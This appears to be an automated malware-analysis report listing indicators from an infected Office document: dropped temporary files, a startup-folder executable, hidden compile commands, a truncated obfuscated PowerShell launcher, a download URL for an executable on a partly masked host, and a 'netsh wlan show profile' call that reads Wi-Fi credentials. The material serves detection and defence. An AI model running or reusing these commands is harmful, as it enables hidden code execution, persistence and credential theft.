Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\appdata.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function xc5dae {param($cb5123c)$o31f8='r727c4';$ra872='';for ($i=0; $i -lt $cb5123c.length;$i+=2){$o28dba1=[convert]::ToByte($cb5123c.Substring($i,2),16);$ra872+=[char]($...
- ca1cd7.exe
- %TEMP%\gthuaa5h.0.cs
- %TEMP%\loeoet5k.0.cs
- %TEMP%\fef1ng4b.dll
- %TEMP%\res20fe.tmp
- %TEMP%\csc20de.tmp
- %TEMP%\fef1ng4b.out
- %TEMP%\fef1ng4b.cmdline
- %TEMP%\fef1ng4b.0.cs
- %TEMP%\xi2i7rnz.dll
- %TEMP%\resfa0e.tmp
- %TEMP%\cscf9ed.tmp
- %TEMP%\xi2i7rnz.out
- %TEMP%\xi2i7rnz.cmdline
- %TEMP%\xi2i7rnz.0.cs
- %TEMP%\vsl5lk2d.dll
- %TEMP%\resd4f2.tmp
- %TEMP%\cscd4d1.tmp
- %TEMP%\vsl5lk2d.out
- %TEMP%\vsl5lk2d.cmdline
- %TEMP%\vsl5lk2d.0.cs
- %TEMP%\resb36f.tmp
- %TEMP%\9crvgghv.dll
- %TEMP%\loeoet5k.cmdline
- %TEMP%\loeoet5k.out
- %TEMP%\resb494.tmp
- %TEMP%\cscb483.tmp
- %TEMP%\k5jwlapo.out
- %TEMP%\k5jwlapo.cmdline
- %TEMP%\k5jwlapo.0.cs
- %TEMP%\egt9syyv.dll
- %TEMP%\res967c.tmp
- %TEMP%\csc966c.tmp
- %TEMP%\egt9syyv.out
- %TEMP%\egt9syyv.0.cs
- %TEMP%\csc561c.tmp
- %TEMP%\hgqn1vc_.dll
- %TEMP%\res749d.tmp
- %TEMP%\csc747c.tmp
- %TEMP%\hgqn1vc_.out
- %TEMP%\hgqn1vc_.cmdline
- %TEMP%\hgqn1vc_.0.cs
- %TEMP%\loeoet5k.dll
- %TEMP%\res4908.tmp
- %TEMP%\csc48e8.tmp
- %TEMP%\cscb35f.tmp
- %TEMP%\9crvgghv.out
- %TEMP%\9crvgghv.cmdline
- %TEMP%\xyju2c7z.0.cs
- %TEMP%\zqhekdxg.dll
- %TEMP%\rese988.tmp
- %TEMP%\gtwhse-g.dll
- %TEMP%\gthuaa5h.dll
- %TEMP%\rese794.tmp
- %TEMP%\rese8bd.tmp
- %TEMP%\csce977.tmp
- %TEMP%\csce89d.tmp
- %TEMP%\csce783.tmp
- %TEMP%\zqhekdxg.out
- %TEMP%\zqhekdxg.cmdline
- %TEMP%\zqhekdxg.0.cs
- %TEMP%\gtwhse-g.out
- %TEMP%\gtwhse-g.cmdline
- %TEMP%\gtwhse-g.0.cs
- %TEMP%\gthuaa5h.out
- %TEMP%\gthuaa5h.cmdline
- %TEMP%\xyju2c7z.out
- %TEMP%\csc2eb.tmp
- %TEMP%\xyju2c7z.cmdline
- %TEMP%\res30b.tmp
- %TEMP%\9crvgghv.0.cs
- %TEMP%\xyju2c7z.dll
- %TEMP%\ziqcv_vl.dll
- %TEMP%\res9161.tmp
- %TEMP%\csc9150.tmp
- %TEMP%\ziqcv_vl.out
- %TEMP%\ziqcv_vl.cmdline
- %TEMP%\ziqcv_vl.0.cs
- %APPDATA%\ca1cd7.exe
- %TEMP%\f83ejq61.dll
- %TEMP%\egt9syyv.cmdline
- %TEMP%\k5jwlapo.dll
- %TEMP%\f83ejq61.out
- %TEMP%\f83ejq61.cmdline
- %TEMP%\f83ejq61.0.cs
- %TEMP%\0zqbdtrl.dll
- %TEMP%\res13e4.tmp
- %TEMP%\csc13d3.tmp
- %TEMP%\0zqbdtrl.out
- %TEMP%\0zqbdtrl.cmdline
- %TEMP%\0zqbdtrl.0.cs
- %TEMP%\res563c.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{3e1bf4ff-4631-41ee-9025-db416c207fd0}.tmp
- %TEMP%\rese794.tmp
- %TEMP%\fef1ng4b.cmdline
- %TEMP%\fef1ng4b.pdb
- %TEMP%\fef1ng4b.dll
- %TEMP%\fef1ng4b.out
- %TEMP%\csc20de.tmp
- %TEMP%\res20fe.tmp
- %TEMP%\xi2i7rnz.pdb
- %TEMP%\xi2i7rnz.out
- %TEMP%\xi2i7rnz.0.cs
- %TEMP%\xi2i7rnz.dll
- %TEMP%\fef1ng4b.0.cs
- %TEMP%\xi2i7rnz.cmdline
- %TEMP%\resfa0e.tmp
- %TEMP%\vsl5lk2d.pdb
- %TEMP%\vsl5lk2d.dll
- %TEMP%\vsl5lk2d.0.cs
- %TEMP%\vsl5lk2d.cmdline
- %TEMP%\vsl5lk2d.out
- %TEMP%\cscd4d1.tmp
- %TEMP%\resd4f2.tmp
- %TEMP%\9crvgghv.pdb
- %TEMP%\9crvgghv.cmdline
- %TEMP%\cscf9ed.tmp
- %TEMP%\res4908.tmp
- %TEMP%\csc48e8.tmp
- %TEMP%\loeoet5k.0.cs
- %TEMP%\k5jwlapo.out
- %TEMP%\k5jwlapo.dll
- %TEMP%\k5jwlapo.0.cs
- %TEMP%\cscb483.tmp
- %TEMP%\resb494.tmp
- %TEMP%\egt9syyv.pdb
- %TEMP%\egt9syyv.out
- %TEMP%\egt9syyv.dll
- %TEMP%\egt9syyv.0.cs
- %TEMP%\egt9syyv.cmdline
- %TEMP%\csc966c.tmp
- %TEMP%\res967c.tmp
- %TEMP%\hgqn1vc_.cmdline
- %TEMP%\hgqn1vc_.out
- %TEMP%\hgqn1vc_.0.cs
- %TEMP%\hgqn1vc_.pdb
- %TEMP%\hgqn1vc_.dll
- %TEMP%\csc747c.tmp
- %TEMP%\res749d.tmp
- %TEMP%\loeoet5k.out
- %TEMP%\loeoet5k.pdb
- %TEMP%\loeoet5k.dll
- %TEMP%\loeoet5k.cmdline
- %TEMP%\9crvgghv.out
- %TEMP%\k5jwlapo.pdb
- %TEMP%\9crvgghv.0.cs
- %TEMP%\cscb35f.tmp
- %TEMP%\csc2eb.tmp
- %TEMP%\res30b.tmp
- %TEMP%\zqhekdxg.cmdline
- %TEMP%\zqhekdxg.dll
- %TEMP%\zqhekdxg.out
- %TEMP%\zqhekdxg.pdb
- %TEMP%\zqhekdxg.0.cs
- %TEMP%\csce977.tmp
- %TEMP%\rese988.tmp
- %TEMP%\gtwhse-g.out
- %TEMP%\xyju2c7z.cmdline
- %TEMP%\gtwhse-g.dll
- %TEMP%\gtwhse-g.pdb
- %TEMP%\gtwhse-g.cmdline
- %TEMP%\csce89d.tmp
- %TEMP%\rese8bd.tmp
- %TEMP%\gthuaa5h.pdb
- %TEMP%\gthuaa5h.0.cs
- %TEMP%\gthuaa5h.cmdline
- %TEMP%\gthuaa5h.out
- %TEMP%\gthuaa5h.dll
- %TEMP%\csce783.tmp
- %TEMP%\gtwhse-g.0.cs
- %TEMP%\xyju2c7z.pdb
- %TEMP%\xyju2c7z.0.cs
- %TEMP%\xyju2c7z.dll
- %TEMP%\resb36f.tmp
- %TEMP%\ziqcv_vl.out
- %TEMP%\ziqcv_vl.cmdline
- %TEMP%\ziqcv_vl.dll
- %TEMP%\ziqcv_vl.pdb
- %TEMP%\ziqcv_vl.0.cs
- %TEMP%\csc9150.tmp
- %TEMP%\res9161.tmp
- %TEMP%\f83ejq61.cmdline
- %TEMP%\f83ejq61.out
- %TEMP%\f83ejq61.0.cs
- %TEMP%\f83ejq61.pdb
- %TEMP%\f83ejq61.dll
- %TEMP%\csc561c.tmp
- %TEMP%\res563c.tmp
- %TEMP%\0zqbdtrl.pdb
- %TEMP%\0zqbdtrl.dll
- %TEMP%\0zqbdtrl.cmdline
- %TEMP%\0zqbdtrl.0.cs
- %TEMP%\0zqbdtrl.out
- %TEMP%\csc13d3.tmp
- %TEMP%\res13e4.tmp
- %TEMP%\xyju2c7z.out
- %TEMP%\9crvgghv.dll
- %TEMP%\k5jwlapo.cmdline
- http://em#####rita-4645.fem.jp/ugo/send/sembaaa.exe
- DNS ASK em#####rita-4645.fem.jp
- '%APPDATA%\ca1cd7.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function xc5dae {param($cb5123c)$o31f8='r727c4';$ra872='';for ($i=0; $i -lt $cb5123c.length;$i+=2){$o28dba1=[convert]::ToByte($cb5123c.Substring($i,2),16);$ra872+=[char]($...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES967C.tmp" "%TEMP%\CSC966C.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\egt9syyv.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES749D.tmp" "%TEMP%\CSC747C.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\hgqn1vc_.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4908.tmp" "%TEMP%\CSC48E8.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\loeoet5k.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES20FE.tmp" "%TEMP%\CSC20DE.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fef1ng4b.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFA0E.tmp" "%TEMP%\CSCF9ED.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xi2i7rnz.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD4F2.tmp" "%TEMP%\CSCD4D1.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vsl5lk2d.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB36F.tmp" "%TEMP%\CSCB35F.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9crvgghv.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9161.tmp" "%TEMP%\CSC9150.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ziqcv_vl.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES563C.tmp" "%TEMP%\CSC561C.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\f83ejq61.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES13E4.tmp" "%TEMP%\CSC13D3.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\0zqbdtrl.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES30B.tmp" "%TEMP%\CSC2EB.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xyju2c7z.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE988.tmp" "%TEMP%\CSCE977.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE8BD.tmp" "%TEMP%\CSCE89D.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE794.tmp" "%TEMP%\CSCE783.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zqhekdxg.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gtwhse-g.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gthuaa5h.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\k5jwlapo.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB494.tmp" "%TEMP%\CSCB483.tmp"' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB494.tmp" "%TEMP%\CSCB483.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\k5jwlapo.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES967C.tmp" "%TEMP%\CSC966C.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\egt9syyv.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES749D.tmp" "%TEMP%\CSC747C.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\hgqn1vc_.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES4908.tmp" "%TEMP%\CSC48E8.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\loeoet5k.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES20FE.tmp" "%TEMP%\CSC20DE.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fef1ng4b.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFA0E.tmp" "%TEMP%\CSCF9ED.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xi2i7rnz.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD4F2.tmp" "%TEMP%\CSCD4D1.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\vsl5lk2d.cmdline"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB36F.tmp" "%TEMP%\CSCB35F.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES9161.tmp" "%TEMP%\CSC9150.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ziqcv_vl.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES563C.tmp" "%TEMP%\CSC561C.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\f83ejq61.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES13E4.tmp" "%TEMP%\CSC13D3.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\0zqbdtrl.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES30B.tmp" "%TEMP%\CSC2EB.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\xyju2c7z.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE988.tmp" "%TEMP%\CSCE977.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE8BD.tmp" "%TEMP%\CSCE89D.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE794.tmp" "%TEMP%\CSCE783.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zqhekdxg.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gtwhse-g.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gthuaa5h.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\9crvgghv.cmdline"
- '%WINDIR%\syswow64\netsh.exe' wlan show profile